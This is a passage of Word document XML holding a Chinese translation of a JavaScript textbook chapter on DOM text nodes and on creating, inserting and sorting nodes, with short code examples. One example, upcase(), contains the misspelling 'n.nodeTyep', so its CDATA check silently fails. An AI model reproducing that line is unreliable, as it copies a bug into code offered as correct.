      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return 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nodeValue</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写，设置它可以改变</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>CDATASection</w:t>
      </w:r>
      <w:r>
        <w:t>节点所显示的内容。</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CDATASection</w:t>
      </w:r>
      <w:r>
        <w:t>都是</w:t>
      </w:r>
      <w:r>
        <w:t>CharacterData</w:t>
      </w:r>
      <w:r>
        <w:t>的子类型，可以在第四部分查看相关信息。</w:t>
      </w:r>
      <w:r>
        <w:t>CharacterData</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它和</w:t>
      </w:r>
      <w:r>
        <w:t>nodeValue</w:t>
      </w:r>
      <w:r>
        <w:t>的文本相同。以下函数通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性将</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的内容转换成大写形式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>递归地把</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>的后代子节点中的所有</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点内容转换为大写形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function upcase(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n.nodeType==3||n.nodeTyep==4)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>CDATA</w:t>
      </w:r>
      <w:r>
        <w:t>节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.data=n.data.toUpperCase();//……</w:t>
      </w:r>
      <w:r>
        <w:t>转换为大写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>else//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，递归进入其子节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>n.childNodes.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>upcase(n.childNodes[i]);</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CharacterData</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了一些在</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>CDATASection</w:t>
      </w:r>
      <w:r>
        <w:t>节点中不太常用的方法来添加、删除、插入和替换文本。除了修改已存在</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的内容，还可以</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>中插入全新的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点或用新</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点来替换已有节点。创建、插入和删除节点就是下一节的主题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="373" w:name="15_6_Chuang_Jian___Cha_Ru_He_Shan_Chu_Ji"/>
      <w:r>
        <w:t>15.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　创建、插入和删除节点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="373"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经看到用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>和纯文本字符串如何来查询和修改文档内容，也已经看到我们能够遍历</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>来检查组成</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>的每个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点。在每个节点级别修改文档也是有可能的。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>类型定义了创建</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>类型定义了在节点树中插入、删除和替换的方法。例</w:t>
      </w:r>
      <w:r>
        <w:t>13-4</w:t>
      </w:r>
      <w:r>
        <w:t>展示了节点的创建和插入，这里复制了这个简</w:t>
      </w:r>
      <w:r>
        <w:t>短的示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>从指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，异步加载和执行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function loadasync(url){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var head=document.getElementsByTagName("head")[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>查找文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=document.createElement("script");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.src=url;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置它的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>head.appendChild(s);//</w:t>
      </w:r>
      <w:r>
        <w:t>将该＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞插入到</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>中</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以下小节包含了节点创建、插入和</w:t>
      </w:r>
      <w:r>
        <w:t>删除的更多细节和具体例子，也包含在操作多个节点时的一种捷径：使用</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="374" w:name="15_6_1_Chuang_Jian_Jie_Dian_"/>
      <w:r>
        <w:t>15.6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　创建节点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="374"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如以上代码所示，创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>createElement()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。给方法传递元素的标签名：对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档来说该名字不区分大小写，对</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档则区分大小写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点用类似的方法创建：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var newnode=document.createTextNode("text node content");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了一些其他的工厂方法，如不经常使用的</w:t>
      </w:r>
      <w:r>
        <w:t>createComment()</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>15.6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中使用了</w:t>
      </w:r>
      <w:r>
        <w:t>createDocumentFragment()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。在使用了</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间的文档中，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>createElementNS()</w:t>
      </w:r>
      <w:r>
        <w:t>来同时指定命名空间的</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>和待创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的标签名字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一种创建新文档节点的方法是复制已存在的节点。每个节点有一个</w:t>
      </w:r>
      <w:r>
        <w:t>cloneNode()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来返回该节点的一个全新副本。给方法传递参数</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>也能够递归地复制所有的后代节点，或传递参数</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>只是执行一个浅复制</w:t>
      </w:r>
      <w:r>
        <w:t>。在除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的其他浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了一个类似的方法叫</w:t>
      </w:r>
      <w:r>
        <w:t>importNode()</w:t>
      </w:r>
      <w:r>
        <w:t>。如果给它传递另一个文档的一个节点，它将返回一个适合本文档插入的节点的副本。传递</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>作为第二个参数，该方法将递归地导入所有的后代节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="375" w:name="15_6_2_Cha_Ru_Jie_Dian_"/>
      <w:r>
        <w:t>15.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　插入节点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="375"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一旦有了一个新节点，就可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的方法</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>insertBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>将它插入到文档中。</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>是在需要插入的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点上调用的，它插入指定的节点使其成为那个节点的最后一个子节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>insertBe</w:t>
      </w:r>
      <w:r>
        <w:t>fore()</w:t>
      </w:r>
      <w:r>
        <w:t>就像</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，除了它接受两个参数。第一个参数就是待插入的节点，第二个参数是已存在的节点，新节点将插入该节点的前面。该方法应该是在新节点的父节点上调用，方法的第二个参数必须是该父节点的子节点。如果传递</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>作为第二个参数，</w:t>
      </w:r>
      <w:r>
        <w:t>insertBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为类似</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>，它将节点插入在最后。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是一个在数字索引的位置插入节点的简单函数。它同时展示了</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>insertBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>child</w:t>
      </w:r>
      <w:r>
        <w:t>节点插入到</w:t>
      </w:r>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>中，使其</w:t>
      </w:r>
      <w:r>
        <w:t>成为第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个子节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function insertAt(parent,child,n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>0||n</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>parent.childNodes.length)throw new Error("invalid index");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(n==parent.childNodes.length)parent.appendChild(child);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else parent.insertBefore(child,parent.childNodes[n]);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如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>inser</w:t>
      </w:r>
      <w:r>
        <w:t>tBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>将已存在文档中的一个节点再次插入，那个节点将自动从它当前的位置删除并在新的位置重新插入：没有必要显式删除该节点。例</w:t>
      </w:r>
      <w:r>
        <w:t>15-4</w:t>
      </w:r>
      <w:r>
        <w:t>展示了一个函数，基于表格指定列中单元格的值来进行行排序。它没有创建任何新的节点，只是用</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>来改变已存在节点的顺序罢了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-4</w:t>
      </w:r>
      <w:r>
        <w:t>：表格的行排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>根据指定表格每行第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个单元格的值，对第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞中的行进行排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果存在</w:t>
      </w:r>
      <w:r>
        <w:t>comparator</w:t>
      </w:r>
      <w:r>
        <w:t>函数则使用它，否则按字母表顺序比较</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function sortrows(table,n,com</w:t>
      </w:r>
      <w:r>
        <w:t>parator){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var tbody=table.tBodies[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞，可能是隐式创建的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var rows=tbody.getElementsByTagName("tr");//tbody</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>rows=Array.prototype.slice.call(rows,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>真实数组中的快照</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>基于第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的值对行排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>rows.sort(function(row1,row2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>cell1=row1.getElementsByTagName("td")[n];//</w:t>
      </w:r>
      <w:r>
        <w:t>获得第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个单元格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cell2=row2.getElementsByTagName("td")[n];//</w:t>
      </w:r>
      <w:r>
        <w:t>两行都是</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var val1=cell1.textContent||cell1.innerText;//</w:t>
      </w:r>
      <w:r>
        <w:t>获得文本内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var val2=cell2.textContent||cell2.innerText;//</w:t>
      </w:r>
      <w:r>
        <w:t>两单元格都是</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(comparator)return comparator(val1,val2);//</w:t>
      </w:r>
      <w:r>
        <w:t>进</w:t>
      </w:r>
      <w:r>
        <w:t>行比较</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(val1</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>val2)return-1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(val1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>val2)return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>中按它们的顺序把行添加到最后</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这将自动把它们从当前位置移走，故没必要预先删除它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞还包含了除了＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞的任何其他元素，这些节点将会悬浮到顶部位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>rows.length;i++)tbody.appendChild(rows[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找表格的＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
